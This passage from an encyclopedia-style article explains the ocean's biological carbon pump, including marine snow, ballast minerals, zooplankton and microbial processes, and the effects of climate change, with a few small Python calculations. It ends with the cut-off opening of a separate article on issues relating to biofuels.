and POC respectively), only POC leads to efficient carbon export to the ocean interior, whereas the DOC fraction in surface waters is mostly recycled by bacteria. However, a more biologically resistant DOC fraction produced in the euphotic zone (accounting for 15–20% of net community productivity) is not immediately mineralized by microbes and accumulates in the ocean surface as biologically semi-labile DOC. This semi-labile DOC undergoes net export to the deep ocean, thus constituting a dynamic part of the biological carbon pump. The efficiency of DOC production and export varies across oceanographic regions, being more prominent in the oligotrophic subtropical oceans. The overall efficiency of the biological carbon pump is mostly controlled by the export of POC. Marine snow Most carbon incorporated in organic and inorganic biological matter is formed at the sea surface where it can then start sinking to the ocean floor. The deep ocean gets most of its nutrients from the higher water column when they sink down in the form of marine snow. This is made up of dead or dying animals and microbes, fecal matter, sand and other inorganic material. A single phytoplankton cell has a sinking rate around one metre per day. Given that the average depth of the ocean is about four kilometres, it can take over ten years for these cells to reach the ocean floor. However, through processes such as coagulation and expulsion in predator fecal pellets, these cells form aggregates. These aggregates, known as marine snow, have sinking rates orders of magnitude greater than individual cells and complete their journey to the deep in a matter of days.
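The sinking times quoted above follow from simple division of depth by sinking rate. Here is a minimal numeric check in Python, using the one metre per day single-cell rate and the four kilometre average depth from the text; the aggregate rate of 150 m per day is purely illustrative, since observed marine snow speeds span a wide range.

mean_ocean_depth_m = 4000.0       # average ocean depth, ~4 km (from the text)

single_cell_rate = 1.0            # m/day, lone phytoplankton cell (from the text)
aggregate_rate = 150.0            # m/day, assumed marine-snow value (illustrative)

print(mean_ocean_depth_m / single_cell_rate / 365)  # ~11 years to the seafloor
print(mean_ocean_depth_m / aggregate_rate)          # ~27 days as an aggregate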
In the diagram on the right, phytoplankton fix CO2 in the euphotic zone using solar energy and produce particulate organic carbon (POC). POC formed in the euphotic zone is processed by microbes, zooplankton and their consumers into organic aggregates (marine snow), which is thereafter exported to the mesopelagic (200–1000 m depth) and bathypelagic zones by sinking and vertical migration by zooplankton and fish. Export flux is defined as the sedimentation out of the surface layer (at approximately 100 m depth) and sequestration flux is the sedimentation out of the mesopelagic zone (at approximately 1000 m depth). A portion of the POC is respired back to CO2 in the oceanic water column at depth, mostly by heterotrophic microbes and zooplankton, thus maintaining a vertical gradient in concentration of dissolved inorganic carbon (DIC). This deep-ocean DIC returns to the atmosphere on millennial timescales through thermohaline circulation. Between 1% and 40% of the primary production is exported out of the euphotic zone; this flux attenuates exponentially towards the base of the mesopelagic zone, and only about 1% of the surface production reaches the sea floor. Of the 50–60 Pg of carbon fixed annually, roughly 10% leaves the surface mixed layer of the oceans, while less than 0.5% eventually reaches the sea floor. Most is retained in regenerated production in the euphotic zone and a significant portion is remineralized in midwater processes during particle sinking. The portion of carbon that leaves the surface mixed layer of the ocean is sometimes considered "sequestered", and essentially removed from contact with the atmosphere for many centuries. However, work also finds that, in regions such as the Southern Ocean, much of this carbon can quickly (within decades) come back into contact with the atmosphere. Budget calculations of the biological carbon pump are based on the ratio between sedimentation (carbon export) and remineralization (release to the atmosphere). It has been estimated that sinking particles export up to 25% of the carbon captured by phytoplankton in the surface ocean to deeper water layers. About 20% of this export (5% of surface values) is buried in the ocean sediments, mainly due to their mineral ballast. During the sinking process, these organic particles are hotspots of microbial activity and represent important loci for organic matter mineralization and nutrient redistribution in the water column. Biomineralization Ballast minerals Observations have shown that fluxes of ballast minerals (calcium carbonate, opal, and lithogenic material) and organic carbon fluxes are closely correlated in the bathypelagic zones of the ocean. A large fraction of particulate organic matter occurs in the form of marine snow aggregates (>0.5 mm) composed of phytoplankton, detritus, inorganic mineral grains, and fecal pellets in the ocean. Formation and sinking of these aggregates drive the biological carbon pump via export and sedimentation of organic matter from the surface mixed layer to the deep ocean and sediments. The fraction of organic matter that leaves the upper mixed layer of the ocean is, among other factors, determined by the sinking velocity and microbial remineralisation rate of these aggregates.
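The budget fractions quoted in this section combine multiplicatively, and a quick check in Python makes that arithmetic explicit; the 50 Pg C y−1 input is the lower end of the annual fixation range given earlier, and the fractions are those stated in the text.

annual_fixation_pg = 50.0         # Pg C fixed per year (lower bound from the text)

export_fraction = 0.10            # ~10% leaves the surface mixed layer
seafloor_fraction = 0.005         # <0.5% of production reaches the sea floor

print(annual_fixation_pg * export_fraction)    # ~5.0 Pg C per year exported
print(annual_fixation_pg * seafloor_fraction)  # ~0.25 Pg C per year to the sea floor

# Sediment-trap estimate from the same passage: up to 25% of captured carbon
# is exported by sinking particles, and about 20% of that export is buried,
# i.e. 0.25 * 0.20 = 0.05, the "5% of surface values" stated above.
print(0.25 * 0.20)                # 0.05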
The observed correlation between ballast mineral fluxes and organic carbon fluxes has led to the hypothesis that organic carbon export is determined by the presence of ballast minerals within settling aggregates. Mineral ballasting is associated with about 60% of the flux of particulate organic carbon (POC) in the high-latitude North Atlantic, and with about 40% of the flux in the Southern Ocean. Strong correlations also exist in the deep ocean between the presence of ballast minerals and the flux of POC. This suggests ballast minerals enhance POC flux by increasing the sink rate of ballasted aggregates. Ballast minerals could additionally provide aggregated organic matter some protection from degradation. It has been proposed that organic carbon is better preserved in sinking particles due to increased aggregate density and sinking velocity when ballast minerals are present and/or via protection of the organic matter due to quantitative association to ballast minerals. In 2002, Klaas and Archer observed that about 83% of the global particulate organic carbon (POC) fluxes were associated with carbonate, and suggested carbonate was a more efficient ballast mineral as compared to opal and terrigenous material. They hypothesized that the higher density of calcium carbonate compared to that of opal and the higher abundance of calcium carbonate relative to terrigenous material might be the reason for the efficient ballasting by calcium carbonate. However, the direct effects of ballast minerals on sinking velocity and degradation rates in sinking aggregates are still unclear. A 2008 study demonstrated that copepod fecal pellets produced on a diet of diatoms or coccolithophorids show higher sinking velocities as compared to pellets produced on a nanoflagellate diet. Carbon-specific respiration rates in pellets, however, were similar and independent of mineral content. These results suggest differences in mineral composition do not lead to differential protection of POC against microbial degradation, but the enhanced sinking velocities may result in up to 10-fold higher carbon preservation in pellets containing biogenic minerals as compared to that of pellets without biogenic minerals. Minerals seem to enhance the flocculation of phytoplankton aggregates and may even act as a catalyst in aggregate formation. However, it has also been shown that incorporation of minerals can cause aggregates to fragment into smaller and denser aggregates. This can potentially lower the sinking velocity of the aggregated organic material due to the reduced aggregate sizes and, thus, lower the total export of organic matter. Conversely, if the incorporation of minerals increases the aggregate density, its size-specific sinking velocity may also increase, which could potentially increase the carbon export. Therefore, there is still a need for better quantitative investigations of how the interactions between minerals and organic aggregates affect the degradation and sinking velocity of the aggregates and, hence, carbon sequestration in the ocean. Remineralisation Remineralisation refers to the breakdown or transformation of organic matter (those molecules derived from a biological source) into its simplest inorganic forms. These transformations form a crucial link within ecosystems as they are responsible for liberating the energy stored in organic molecules and recycling matter within the system to be reused as nutrients by other organisms. What fraction escapes remineralisation varies depending on the location.
For example, in the North Sea, values of carbon deposition are ~1% of primary production, while that value is <0.5% in the open oceans on average. Therefore, most nutrients remain in the water column, recycled by the biota. Heterotrophic organisms will utilize the materials produced by the autotrophic (and chemotrophic) organisms and, via respiration, will remineralise the compounds from the organic form back to inorganic, making them available for primary producers again. For most areas of the ocean, the highest rates of carbon remineralisation occur in the upper part of the water column, decreasing with depth until remineralisation rates remain roughly constant at 0.1 μmol kg−1 yr−1. This provides the most nutrients available for primary producers within the photic zone, though it leaves the upper surface waters starved of inorganic nutrients. Most remineralisation is done with dissolved organic carbon (DOC). Studies have shown that it is larger sinking particles that transport matter down to the sea floor, while suspended particles and dissolved organics are mostly consumed by remineralisation. This happens in part due to the fact that organisms must typically ingest nutrients smaller than they are, often by orders of magnitude. With the microbial community making up 90% of marine biomass, it is particles smaller than the microbes themselves that will be taken up for remineralisation. Key role of phytoplankton Marine phytoplankton perform half of all photosynthesis on Earth and directly influence global biogeochemical cycles and the climate, yet how they will respond to future global change is unknown. Carbon dioxide is one of the principal drivers of global change and has been identified as one of the major challenges of the 21st century. Carbon dioxide (CO2) generated during anthropogenic activities such as deforestation and burning of fossil fuels for energy generation rapidly dissolves in the surface ocean and lowers seawater pH, while CO2 remaining in the atmosphere increases global temperatures and leads to increased ocean thermal stratification. While the CO2 concentration in the atmosphere is estimated to have been about 270 ppm before the industrial revolution, it has now increased to about 400 ppm and is expected to reach 800–1000 ppm by the end of this century according to the "business as usual" CO2 emission scenario. Marine ecosystems are a major sink for atmospheric CO2 and take up a similar amount of CO2 to terrestrial ecosystems, currently accounting for the removal of nearly one third of anthropogenic CO2 emissions from the atmosphere. The net transfer of CO2 from the atmosphere to the oceans and then sediments is mainly a direct consequence of the combined effect of the solubility and the biological pump. While the solubility pump serves to concentrate dissolved inorganic carbon (CO2 plus bicarbonate and carbonate ions) in the deep oceans, the biological carbon pump (a key natural process and a major component of the global carbon cycle that regulates atmospheric CO2 levels) transfers both organic and inorganic carbon fixed by primary producers (phytoplankton) in the euphotic zone to the ocean interior and subsequently to the underlying sediments. Thus, the biological pump takes carbon out of contact with the atmosphere for several thousand years or longer and maintains atmospheric CO2 at significantly lower levels than would be the case if it did not exist.
An ocean without a biological pump, which transfers roughly 11 Gt C yr−1 into the ocean's interior, would result in atmospheric CO2 levels ~400 ppm higher than present day. Passow and Carlson defined sedimentation out of the surface layer (at approximately 100 m depth) as the "export flux" and that out of the mesopelagic zone (at approximately 1000 m depth) as the "sequestration flux". Once carbon is transported below the mesopelagic zone, it remains in the deep sea for 100 years or longer, hence the term "sequestration" flux. According to the modelling results of Buesseler and Boyd, between 1% and 40% of the primary production is exported out of the euphotic zone, which attenuates exponentially towards the base of the mesopelagic zone, and only about 1% of the surface production reaches the sea floor. The export efficiency of particulate organic carbon (POC) shows regional variability. For instance, in the North Atlantic, over 40% of net primary production is exported out of the euphotic zone, as compared to only 10% in the South Pacific, and this is driven in part by the composition of the phytoplankton community, including cell size and composition (see below). Exported organic carbon is remineralized, that is, respired back to CO2 in the oceanic water column at depth, mainly by heterotrophic microbes and zooplankton. Thus, the biological carbon pump maintains a vertical gradient in the concentration of dissolved inorganic carbon (DIC), with higher values at increased ocean depth. This deep-ocean DIC returns to the atmosphere on millennial timescales through thermohaline circulation. In 2001, Hugh et al. expressed the efficiency of the biological pump as the amount of carbon exported from the surface layer (export production) divided by the total amount produced by photosynthesis (overall production). Modelling studies by Buesseler and Boyd revealed that the overall transfer efficiency of the biological pump is determined by a combination of factors: seasonality; the composition of phytoplankton species; the fragmentation of particles by zooplankton; and the solubilization of particles by microbes. In addition, the efficiency of the biological pump is also dependent on the aggregation and disaggregation of organic-rich aggregates and the interaction between POC aggregates and suspended "ballast" minerals. Ballast minerals (silicate and carbonate biominerals and dust) are the major constituents of particles that leave the ocean surface via sinking. They are typically denser than seawater and most organic matter, thus providing a large part of the density differential needed for sinking of the particles. Aggregation of particles increases vertical flux by transforming small suspended particles into larger, rapidly-sinking ones. It plays an important role in the sedimentation of phytodetritus from surface layer phytoplankton blooms. As illustrated by Turner in 2015, the vertical flux of sinking particles is mainly due to a combination of fecal pellets, marine snow and direct sedimentation of phytoplankton blooms, which are typically composed of diatoms, coccolithophorids, dinoflagellates and other plankton. Marine snow comprises macroscopic organic aggregates >500 μm in size and originates from clumps of aggregated phytoplankton (phytodetritus), discarded appendicularian houses, fecal matter and other miscellaneous detrital particles. Appendicularians secrete mucous feeding structures, or "houses", to collect food particles, and discard and renew them up to 40 times a day.
Discarded appendicularian houses are highly abundant (thousands per m3 in surface waters) and are microbial hotspots with high concentrations of bacteria, ciliates, flagellates and phytoplankton. These discarded houses are therefore among the most important sources of aggregates directly produced by zooplankton in terms of carbon cycling potential. The composition of the phytoplankton community in the euphotic zone largely determines the quantity and quality of organic matter that sinks to depth. The main functional groups of marine phytoplankton that contribute to export production include nitrogen fixers (diazotrophic cyanobacteria), silicifiers (diatoms) and calcifiers (coccolithophores). Each of these phytoplankton groups differs in the size and composition of their cell walls and coverings, which influence their sinking velocities. For example, autotrophic picoplankton (0.2–2 μm in diameter)—which include taxa such as cyanobacteria (e.g., Prochlorococcus spp. and Synechococcus spp.) and prasinophytes (various genera of eukaryotes <2 μm)—are believed to contribute much less to carbon export from surface layers due to their small size, slow sinking velocities (<0.5 m/day) and rapid turnover in the microbial loop. In contrast, larger phytoplankton cells such as diatoms (2–500 μm in diameter) are very efficient in transporting carbon to depth by forming rapidly sinking aggregates. They are unique among phytoplankton, because they require Si in the form of silicic acid (Si(OH)4) for growth and production of their frustules, which are made of biogenic silica (bSiO2) and act as ballast. According to the reports of Miklasz and Denny, the sinking velocities of diatoms can range from 0.4 to 35 m/day. Analogously, coccolithophores are covered with calcium carbonate plates called 'coccoliths', which are central to aggregation and ballasting, producing sinking velocities of nearly 5 m/day. Although it has been assumed that picophytoplankton, characterizing vast oligotrophic areas of the ocean, do not contribute substantially to the particulate organic carbon (POC) flux, in 2007 Richardson and Jackson suggested that all phytoplankton, including picoplankton cells, contribute equally to POC export. They proposed alternative pathways for picoplankton carbon cycling, which rely on aggregation as a mechanism for both direct sinking (the export of picoplankton as POC) and mesozooplankton- or large filter feeder-mediated sinking of picoplankton-based production. Zooplankton grazing Sloppy feeding In addition to linking primary producers to higher trophic levels in marine food webs, zooplankton also play an important role as "recyclers" of carbon and other nutrients that significantly impact marine biogeochemical cycles, including the biological pump. This is particularly the case with copepods and krill, and is especially important in oligotrophic waters of the open ocean. Through sloppy feeding, excretion, egestion, and leaching of fecal pellets, zooplankton release dissolved organic matter (DOM) which controls DOM cycling and supports the microbial loop. Absorption efficiency, respiration, and prey size all further complicate how zooplankton are able to transform and deliver carbon to the deep ocean. Excretion and sloppy feeding (the physical breakdown of the food source) make up 80% and 20% of crustacean zooplankton-mediated DOM release respectively. In the same study, fecal pellet leaching was found to be an insignificant contributor.
For protozoan grazers, DOM is released primarily through excretion and egestion, and gelatinous zooplankton can also release DOM through the production of mucus. Leaching of fecal pellets can extend from hours to days after initial egestion and its effects can vary depending on food concentration and quality. Various factors can affect how much DOM is released from zooplankton individuals or populations. Fecal pellets The fecal pellets of zooplankton can be important vehicles for the transfer of particulate organic carbon (POC) to the deep ocean, often making large contributions to carbon sequestration. The size distribution of the copepod community indicates high numbers of small fecal pellets are produced in the epipelagic. However, small fecal pellets are rare in the deeper layers, suggesting they are not transferred efficiently to depth. This means small fecal pellets make only minor contributions to fecal pellet fluxes in the meso- and bathypelagic, particularly in terms of carbon. In a study focussed on the Scotia Sea, which contains some of the most productive regions in the Southern Ocean, the dominant fecal pellets in the upper mesopelagic were cylindrical and elliptical, while ovoid fecal pellets were dominant in the bathypelagic. The change in fecal pellet morphology, as well as size distribution, points to the repacking of surface fecal pellets in the mesopelagic and in situ production in the lower meso- and bathypelagic, which may be augmented by inputs of fecal pellets via zooplankton vertical migrations. This suggests the flux of carbon to the deeper layers within the Southern Ocean is strongly modulated by meso- and bathypelagic zooplankton, meaning that the community structure in these zones has a major impact on the efficiency of the fecal pellet transfer to ocean depths. Absorption efficiency (AE) is the proportion of food absorbed by plankton that determines how available the consumed organic materials are in meeting the required physiological demands. Depending on the feeding rate and prey composition, variations in AE may lead to variations in fecal pellet production, and thus regulate how much organic material is recycled back to the marine environment. Low feeding rates typically lead to high AE and small, dense pellets, while high feeding rates typically lead to low AE and larger pellets with more organic content. Another contributing factor to DOM release is respiration rate. Physical factors such as oxygen availability, pH, and light conditions may affect overall oxygen consumption and how much carbon is lost from zooplankton in the form of respired CO2. The relative sizes of zooplankton and prey also mediate how much carbon is released via sloppy feeding. Smaller prey are ingested whole, whereas larger prey may be fed on more "sloppily", that is, more biomatter is released through inefficient consumption. There is also evidence that diet composition can impact nutrient release, with carnivorous diets releasing more dissolved organic carbon (DOC) and ammonium than omnivorous diets. Microbial loop Bacterial lysis The microbial loop describes a trophic pathway in the marine microbial food web where dissolved organic carbon (DOC) is returned to higher trophic levels via its incorporation into bacterial biomass, and then coupled with the classic food chain formed by phytoplankton-zooplankton-nekton. The term microbial loop was coined by Farooq Azam, Tom Fenchel et al.
in 1983 to include the role played by bacteria in the carbon and nutrient cycles of the marine environment. In general, dissolved organic carbon is introduced into the ocean environment from bacterial lysis, the leakage or exudation of fixed carbon from phytoplankton (e.g., mucilaginous exopolymer from diatoms), sudden cell senescence, sloppy feeding by zooplankton, the excretion of waste products by aquatic animals, or the breakdown or dissolution of organic particles from terrestrial plants and soils. Bacteria in the microbial loop decompose this particulate detritus to utilize this energy-rich matter for growth. Since more than 95% of organic matter in marine ecosystems consists of polymeric, high molecular weight (HMW) compounds (e.g., protein, polysaccharides, lipids), only a small portion of total dissolved organic matter (DOM) is readily utilizable by most marine organisms at higher trophic levels. This means that dissolved organic carbon is not available directly to most marine organisms; marine bacteria introduce this organic carbon into the food web, resulting in additional energy becoming available to higher trophic levels. Viral shunt As much as 25% of the primary production from phytoplankton in the global oceans may be recycled within the microbial loop through viral shunting. The viral shunt is a mechanism whereby marine viruses prevent microbial particulate organic matter (POM) from migrating up trophic levels by recycling them into dissolved organic matter (DOM), which can be readily taken up by microorganisms. The DOM recycled by the viral shunt pathway is comparable to the amount generated by the other main sources of marine DOM. Viruses can easily infect microorganisms in the microbial loop due to their relative abundance compared to microbes. Prokaryotic and eukaryotic mortality contribute to carbon nutrient recycling through cell lysis. There is also evidence of nitrogen (specifically ammonium) regeneration. This nutrient recycling helps stimulate microbial growth. Macroorganisms Jelly fall Jelly-falls are marine carbon cycling events whereby gelatinous zooplankton, primarily cnidarians, sink to the seafloor and enhance carbon and nitrogen fluxes via rapidly sinking particulate organic matter. These events provide nutrition to benthic megafauna and bacteria. Jelly-falls have been implicated as a major "gelatinous pathway" for the sequestration of labile biogenic carbon through the biological pump. These events are common in protected areas with high levels of primary production and water quality suitable to support cnidarian species. These areas include estuaries, and several studies have been conducted in fjords of Norway. Whale pump Whales and other marine mammals also enhance primary productivity in their feeding areas by concentrating nitrogen near the surface through the release of flocculent fecal plumes. For example, whales and seals may be responsible for replenishing more nitrogen in the Gulf of Maine's euphotic zone than the input of all rivers combined. This upward whale pump played a much larger role before industrial fishing devastated marine mammal stocks, when recycling of nitrogen was likely more than three times the atmospheric nitrogen input. The biological pump mediates the removal of carbon and nitrogen from the euphotic zone through the downward flux of aggregates, feces, and vertical migration of invertebrates and fish.
Copepods and other zooplankton produce sinking fecal pellets and contribute to the downward transport of dissolved and particulate organic matter by respiring and excreting at depth during migration cycles, thus playing an important role in the export of nutrients (N, P, and Fe) from surface waters. Zooplankton feed in the euphotic zone and export nutrients via sinking fecal pellets and vertical migration. Fish typically release nutrients at the same depth at which they feed. Excretion by marine mammals, tethered to the surface for respiration, is expected to occur shallower in the water column than where they feed. Marine mammals provide important ecosystem services. On a global scale, they can influence climate through fertilization events and the export of carbon from surface waters to the deep sea through sinking whale carcasses. In coastal areas, whales retain nutrients locally, increasing ecosystem productivity and perhaps raising the carrying capacity for other marine consumers, including commercial fish species. It has been estimated that, in terms of carbon sequestration, one whale is equivalent to thousands of trees. Vertical migrations Diel vertically migrating krill, salps, smaller zooplankton and fish can actively transport carbon to depth by consuming POC in the surface layer at night and metabolising it at their daytime, mesopelagic residence depths. Depending on species life history, active transport may occur on a seasonal basis as well. Without vertical migration, the biological pump would be far less efficient. Organisms migrate up to feed at night, so when they migrate back to depth during the day they defecate large sinking fecal pellets. Whilst some larger fecal pellets can sink quite fast, the speed at which organisms move back to depth is still faster. If organisms were to defecate at the surface, it would take the fecal pellets days to reach the depth that they reach in a matter of hours. At night organisms are in the top 100 metres of the water column, but during the day they move down to between 800 and 1000 metres. Therefore, by releasing fecal pellets at depth they have almost 1000 metres less to travel to get to the deep ocean. This is known as active transport: the organisms play an active role in moving organic matter down to depth. Because much of the deep-sea community, especially marine microbes, depends on nutrients sinking from above, the quicker those nutrients reach the ocean floor the better. Zooplankton and salps play a large role in the active transport of fecal pellets. An estimated 15–50% of zooplankton biomass migrates, accounting for the transport of 5–45% of particulate organic nitrogen to depth. Salps are large gelatinous plankton that can vertically migrate 800 metres and eat large amounts of food at the surface. They have a very long gut retention time, so fecal pellets usually are released at maximum depth. Salps are also known for having some of the largest fecal pellets. Because of this they have a very fast sinking rate, and small detritus particles are known to aggregate on them, making them sink faster still. So while much research is still being done on why organisms vertically migrate, it is clear that vertical migration plays a large role in the active transport of dissolved organic matter to depth. Lipid pump The lipid pump sequesters carbon from the ocean's surface to deeper waters via lipids associated with overwintering vertically migratory zooplankton.
Lipids are a class of hydrocarbon-rich, nitrogen- and phosphorus-deficient compounds essential for cellular structures. The lipid-associated carbon enters the deep ocean as carbon dioxide produced by respiration of lipid reserves and as organic matter from the mortality of zooplankton. Compared to the more general biological pump, the lipid pump also results in a lipid shunt, where other nutrients like nitrogen and phosphorus that are consumed in excess must be excreted back to the surface environment and thus are not removed from the surface mixed layer of the ocean. This means that the carbon transported by the lipid pump does not limit the availability of essential nutrients in the ocean surface. Carbon sequestration via the lipid pump is therefore decoupled from nutrient removal, allowing carbon uptake by oceanic primary production to continue. In the biological pump more generally, nutrient removal is always coupled to carbon sequestration; primary production is limited as carbon and nutrients are transported to depth together in the form of organic matter. The contribution of the lipid pump to the sequestering of carbon in the deeper waters of the ocean can be substantial: the carbon transported below 1,000 metres (3,300 ft) by copepods of the genus Calanus in the Arctic Ocean almost equals that transported below the same depth annually by particulate organic carbon (POC) in this region. A significant fraction of this transported carbon would not return to the surface due to respiration and mortality. Research is ongoing to more precisely estimate the amount that remains at depth. The export rate of the lipid pump may vary from 1–9.3 g C m−2 y−1 across temperate and subpolar regions containing seasonally migrating zooplankton. The role of zooplankton, and particularly copepods, in the food web is crucial to the survival of higher trophic level organisms that depend on copepods as their primary source of nutrition. With warming oceans and increasing melting of ice caps due to climate change, the organisms associated with the lipid pump may be affected, thus influencing the survival of many commercially important fish and endangered marine mammals. As a new and previously unquantified component of oceanic carbon sequestration, further research on the lipid pump can improve the accuracy and overall understanding of carbon fluxes in global oceanic systems. Bioluminescent shunt Luminous bacteria in light organ symbioses are successively acquired by their hosts (squid, fish) from the seawater while the hosts are juveniles, then regularly released into the ocean. In the diagram on the right, depending on the light organ position, luminous bacteria are released from their guts into fecal pellets or directly into the seawater (step 1). Motile luminous bacteria colonize organic matter sinking along the water column. Bioluminescent bacteria colonising fecal pellets and particles influence zooplankton consumption rates. Such visual markers increase detection ("bait hypothesis"), attraction and finally predation by upper trophic levels (step 2). In the mesopelagic, zooplankton and their predators feed on sinking luminous particles and fecal pellets, which either form aggregates (repackaging) with faster sinking rates or fragment the organic matter (due to sloppy feeding) into pieces with slower sinking rates (step 3). Filter feeders also aggregate sinking organic matter without particular visual detection and selection of luminous matter.
Diel (and seasonal) vertical migrators feeding on luminous food metabolize and release glowing fecal pellets from the surface to the mesopelagic zone (step 4). This implies dispersal of bioluminescent bacteria over large spatial scales, since zooplankton and even some fish actively swim long distances. Luminous bacteria attached to particles sink down to the seafloor, and the sediment can be resuspended by oceanographic physical conditions (step 5) and consumed by epi-benthic organisms. Instruments shown are (a) plankton net, (b) fish net, (c) Niskin water sampler, (d) bathyphotometer, (e) sediment traps, (f) autonomous underwater vehicles, (g) photomultiplier module, (h) astrophysics optical modules ANTARES and (i–j) remotely operated vehicles. Quantification The geologic component of the carbon cycle operates slowly in comparison to the other parts of the global carbon cycle. It is one of the most important determinants of the amount of carbon in the atmosphere, and thus of global temperatures. As the biological pump plays an important role in the Earth's carbon cycle, significant effort is spent quantifying its strength. However, because they occur as a result of poorly constrained ecological interactions usually at depth, the processes that form the biological pump are difficult to measure. A common method is to estimate primary production fuelled by nitrate and ammonium, as these nutrients have different sources that are related to the remineralisation of sinking material. From these it is possible to derive the so-called f-ratio, a proxy for the local strength of the biological pump (a minimal numeric sketch of this ratio follows the Monitoring paragraph below). Applying the results of local studies to the global scale is complicated by the role the ocean's circulation plays in different ocean regions. Effects of climate change Changes in land use, the combustion of fossil fuels, and the production of cement have led to an increase in CO2 concentration in the atmosphere. At present, about one third (approximately 2 Pg C y−1 = 2 × 1015 grams of carbon per year) of anthropogenic emissions of CO2 may be entering the ocean, but this is quite uncertain. Some research suggests that a link between elevated CO2 and marine primary production exists. Climate change may affect the biological pump in the future by warming and stratifying the surface ocean. It is believed that this could decrease the supply of nutrients to the euphotic zone, reducing primary production there. Also, changes in the ecological success of calcifying organisms caused by ocean acidification may affect the biological pump by altering the strength of the hard tissues pump. This may then have a "knock-on" effect on the soft tissues pump because calcium carbonate acts to ballast sinking organic material. The second diagram on the right shows some possible effects of sea ice decline and permafrost thaw on Arctic carbon fluxes. On land, plants take up carbon while microorganisms in the soil produce methane and respire CO2. Lakes are net emitters of methane, and organic and inorganic carbon (dissolved and particulate) flow into the ocean through freshwater systems. In the ocean, methane can be released from thawing subsea permafrost, and CO2 is absorbed due to an undersaturation of CO2 in the water compared with the atmosphere. In addition, multiple fluxes are closely associated with sea ice. Current best estimates of atmospheric fluxes are given in Tg C year−1, where available.
Note that the emission estimate for lakes is for the area north of ~50° N rather than the narrower definition of arctic tundra for the other terrestrial fluxes. When available, uncertainty ranges are shown in brackets. The arrows do not represent the size of each flux. The biological pump is thought to have played significant roles in atmospheric CO2 fluctuations during past glacial-interglacial periods. However, it is not yet clear how the biological pump will respond to future climate change. For such predictions to be reasonable, it is important to first decipher the response of phytoplankton, one of the key components of the biological pump, to future changes in atmospheric CO2. Due to their phylogenetic diversity, different phytoplankton taxa will likely respond to climate change in different ways. For instance, a decrease in the abundance of diatoms is expected due to increased stratification in the future ocean. Diatoms are highly efficient in transporting carbon to depth by forming large, rapidly sinking aggregates, and their reduced numbers could in turn lead to decreased carbon export. Further, decreased ocean pH due to ocean acidification may thwart the ability of coccolithophores to generate calcareous plates, potentially affecting the biological pump; however, it appears that some species are more sensitive than others. Thus, future changes in the relative abundance of these or other phytoplankton taxa could have a marked impact on total ocean productivity, subsequently affecting ocean biogeochemistry and carbon storage. A 2015 study determined that coccolithophore concentrations in the North Atlantic have increased by an order of magnitude since the 1960s, and increases in absorbed CO2 and temperature were modeled to be the most likely causes of this increase. In a 2017 study, scientists used species distribution modelling (SDM) to predict the future global distribution of two phytoplankton species important to the biological pump: the diatom Chaetoceros diadema and the coccolithophore Emiliania huxleyi. They employed environmental data described in the IPCC Representative Concentration Pathways scenario 8.5, which predicts radiative forcing in the year 2100 relative to pre-industrial values. Their modelling results predicted that the total ocean area covered by C. diadema and E. huxleyi would decline by 8% and 16%, respectively, under the examined climate scenario. They predicted that changes in the range and distribution of these two phytoplankton species under these future ocean conditions, if realized, might result in a reduced contribution to carbon sequestration via the biological pump. In 2019, a study indicated that at current rates of seawater acidification, Antarctic phytoplankton could become smaller and less effective at storing carbon before the end of the century. Monitoring Monitoring the biological pump is critical to understanding how the Earth's carbon cycle is changing. A variety of techniques are used to monitor the biological pump, and they can be deployed from various platforms such as ships, autonomous vehicles, and satellites. At present, satellite remote sensing is the only tool available for viewing the entire surface ocean at high temporal and spatial scales.
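As a minimal numeric sketch of the f-ratio mentioned under Quantification above: the ratio is conventionally taken as new (nitrate-fuelled) production divided by total (nitrate- plus ammonium-fuelled) production, and the Python sketch below uses uptake values invented purely for illustration.

def f_ratio(nitrate_uptake, ammonium_uptake):
    # New production (nitrate-fuelled) as a fraction of total production;
    # higher values suggest a locally stronger biological pump.
    return nitrate_uptake / (nitrate_uptake + ammonium_uptake)

# Invented uptake rates (mmol N m-2 d-1), purely illustrative:
print(f_ratio(2.0, 8.0))   # 0.2, oligotrophic, mostly regenerated production
print(f_ratio(6.0, 4.0))   # 0.6, bloom-like conditions, stronger export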
Needed research Multidisciplinary observations are still needed in the deep water column to properly understand the biological pump: Physics: stratification affects particle sinking; understanding the origin of the particles and the residence time of the DIC from particle remineralization in the deep ocean requires measurement of advection and mixing. Biogeochemistry: export/mixing down of particulate and dissolved organic matter from the surface layer determines the labile organic matter arriving at the seafloor, which is either respired by seafloor biota or stored for longer times in the sediment. Biology and ecosystems: zooplankton and microorganisms break down and remineralize sinking particles in the water column. Exported organic matter feeds all water column and benthic biota (zooplankton, benthic invertebrates, microbes), sustaining their biomass, density, and biodiversity. See also f-ratio (oceanography) Lysocline Mooring (oceanography) Apparent oxygen utilisation
Biological pump
https://en.wikipedia.org/wiki/Issues%20relating%20to%20biofuels
Issues relating to biofuels are social, economic, environmental and technical problems that may arise from biofuel production and use. Social and economic issues include the "food vs fuel" debate and the need to develop responsible policies and economic instruments to ensure sustainable biofuel production. Farming for biofuel feedstock can be detrimental to the environment if not done sustainably. Environmental concerns include deforestation, biodiversity loss and soil erosion as a result of land clearing for biofuels agriculture. While biofuels can contribute to a reduction in global carbon emissions, indirect land use change for biofuel production can have the opposite effect. Technical issues include the modifications that may be necessary to run an engine on biofuel, as well as energy balance and efficiency. The International Resource Panel outlined the wider and interrelated factors that need to be considered when deciding on the relative merits of pursuing one biofuel over another. The IRP concluded that not all biofuels perform equally in terms of their effect on climate, energy security and ecosystems, and suggested that environmental and social effects need to be assessed throughout the entire life-cycle. Social and economic effects Oil price moderation The International Energy Agency's World Energy Outlook 2006 concludes that rising oil demand, if left unchecked, would accentuate the consuming countries' vulnerability to a severe supply disruption and resulting price shock. The report suggested that biofuels may one day offer a viable alternative, but also that "the implications of the use of biofuels for global security as well as for economic, environmental, and public health need to be further evaluated". According to Francisco Blanch, a commodity strategist for Merrill Lynch, crude oil would be trading 15 per cent higher and gasoline would be as much as 25 per cent more expensive, if it were not for biofuels. Gordon Quaiattini, president of the Canadian Renewable Fuels Association, argued that a healthy supply of alternative energy sources will help to combat gasoline price spikes. "Food vs. fuel" debate Food vs fuel is the debate regarding the risk of diverting farmland or crops to biofuels production to the detriment of the food supply on a global scale. Essentially, the debate refers to the possibility that as farmers increase their production of biofuel crops, often in response to government subsidy incentives, time and land are shifted away from non-biofuel crops, driving up the prices of those crops as their production falls. Demand therefore rises not only for the food staples, like corn and cassava, that sustain the majority of the world's poor, but prices may also rise for the remaining crops that these individuals would otherwise need to supplement their diets. A study for the International Centre for Trade and Sustainable Development shows that market-driven expansion of ethanol in the US 